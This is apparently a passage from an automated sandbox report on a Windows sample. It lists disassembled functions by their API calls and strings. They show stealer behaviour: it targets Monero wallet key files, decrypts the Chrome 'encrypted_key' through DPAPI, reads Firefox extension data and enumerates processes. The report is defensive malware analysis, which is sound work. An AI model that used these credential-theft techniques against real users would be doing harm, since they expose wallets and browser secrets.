Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0135A4B0,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0069A3FF
lstrlen.KERNEL32(00000000), ref: 0069A6BC

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

DeleteFileA.KERNEL32(00000000), ref: 0069A743

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 4672ce4a3984e70ccfe434bfd5d27017d8b45b07d6cee0f402802c111343f4da
Instruction ID: d58c2acfe870aac3873b1041955a6209c8c3903263c9bfe1c03d85b85b553c3b
Opcode Fuzzy Hash: 4672ce4a3984e70ccfe434bfd5d27017d8b45b07d6cee0f402802c111343f4da
Instruction Fuzzy Hash: 4EE1C8728101089ADB88FBE4DC92EEE733AAF15300F50815EF51766091EF346E49CF6A

Function 0069D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0135A4B0,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069D801
lstrlen.KERNEL32(00000000), ref: 0069D99F
lstrlen.KERNEL32(00000000), ref: 0069D9B3
DeleteFileA.KERNEL32(00000000), ref: 0069DA32

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: ffc90ebdba95a6d5c612d02ef5f966a40a7ea7cb913136b3cdaec0404339025b
Instruction ID: ec4fa0cc5a3bb6b965317fc3fc70457395b38941be1a3c294e1dde289388d8eb
Opcode Fuzzy Hash: ffc90ebdba95a6d5c612d02ef5f966a40a7ea7cb913136b3cdaec0404339025b
Instruction Fuzzy Hash: D181DD719111089ADB88FBE4DC56AEE737AAF15300F50452EF507A6091EF346E09CF66

Function 0069F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A

Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,006B1580,006B0D92), ref: 0069F54C
lstrlen.KERNEL32(00000000), ref: 0069F56B

Strings

moz-extension+++, xrefs: 0069F5AD
^userContextId=4294967295, xrefs: 0069F59C

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 92ec9d0eaf719c57033b1f0fa3a4dfb0ba088b87f8ceb568bcb468bf3250d9c5
Instruction ID: 5f3b18aece05161ed79a9a7ff01754eb591beace093e6c7736594320737fa8a8
Opcode Fuzzy Hash: 92ec9d0eaf719c57033b1f0fa3a4dfb0ba088b87f8ceb568bcb468bf3250d9c5
Instruction Fuzzy Hash: E0510F75D10108AADB84FBE0DC52DEE737AAF55300F50852DF816A6191EF34AE09CFA6

Function 00699CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A

Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00699D39

Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699AEF
Part of subcall function 00699AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00694EEE,00000000,?), ref: 00699B01
Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699B2A
Part of subcall function 00699AC0: LocalFree.KERNEL32(?,?,?,?,00694EEE,00000000,?), ref: 00699B3F

Part of subcall function 00699B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00699B84
Part of subcall function 00699B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00699BA3
Part of subcall function 00699B60: LocalFree.KERNEL32(?), ref: 00699BD3

Strings

, xrefs: 00699DC1
DPAPI, xrefs: 00699D89
"encrypted_key":", xrefs: 00699D30

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: b8581ff258e350b5b1bdae15e0d3f120598f23aeb409c0be3bc28b6b037e4873
Instruction ID: 573a96729274419cb2e8f27481cc7a3c8be2c7fd89c4308c2db5d542a5184919
Opcode Fuzzy Hash: b8581ff258e350b5b1bdae15e0d3f120598f23aeb409c0be3bc28b6b037e4873
Instruction Fuzzy Hash: 3D3130B5D10109ABCF04EBE8DC85AFFB7BABF49304F14451DE905A7241E7349A44CBA5

Function 006A8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006B05B7), ref: 006A86CA
Process32First.KERNEL32(?,00000128), ref: 006A86DE
Process32Next.KERNEL32(?,00000128), ref: 006A86F3

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

CloseHandle.KERNEL32(?), ref: 006A8761

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 0e07c5a1e3774772d0a0852cb733dd2fd2c0d6372d101a2d483fad7567e022d8
Instruction ID: 24a69466e996a197aa41d53b5ac417e176338160f2eaf49d6b374c2d511fbf61
Opcode Fuzzy Hash: 0e07c5a1e3774772d0a0852cb733dd2fd2c0d6372d101a2d483fad7567e022d8
Instruction Fuzzy Hash: E0314F71901218ABCBA4EF94CC45FEEB779FB46700F10429EE50AA2190DB346E45CFA1

Function 006A6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01359128,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006A6AE8
CloseHandle.KERNEL32(00000000), ref: 006A6AF9
Sleep.KERNEL32(00001770), ref: 006A6B04
CloseHandle.KERNEL32(?,00000000,?,01359128,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6B1A
ExitProcess.KERNEL32 ref: 006A6B22

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 72569cae9857f25cdb82039daed454409340b32064594c6f88b5550fbd516e43
Instruction ID: 17288c1fb91ffb6f1e878413d2ae3e205b98e15a799610a71b85d5b5b67a2a0e
Opcode Fuzzy Hash: 72569cae9857f25cdb82039daed454409340b32064594c6f88b5550fbd516e43
Instruction Fuzzy Hash: 10F05E30A40209ABE740BBA0DD06BBE7BB5FB06701F24461ABA13A11C1DBB05D41DE6A

Function 006947B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

Strings

<, xrefs: 006947C9

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
